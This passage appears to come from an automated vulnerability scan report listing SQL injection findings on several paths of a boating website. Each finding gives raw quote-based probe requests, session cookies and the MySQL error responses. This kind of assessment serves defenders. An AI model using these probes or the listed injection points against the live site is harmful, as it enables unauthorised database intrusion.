<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/new-gear?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.50. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-powerboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-powerboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.51. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/on-sailboats?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/on-sailboats?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.52. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/q-a-a?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/q-a-a?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.53. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/sea-savvy?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/sea-savvy?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.54. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/tech-talk?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/tech-talk?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.55. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /boat-shop/used-boat-review?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /boat-shop/used-boat-review?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.56. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /calendar?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /calendar?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.57. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /career-opportunities?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /career-opportunities?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.58. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
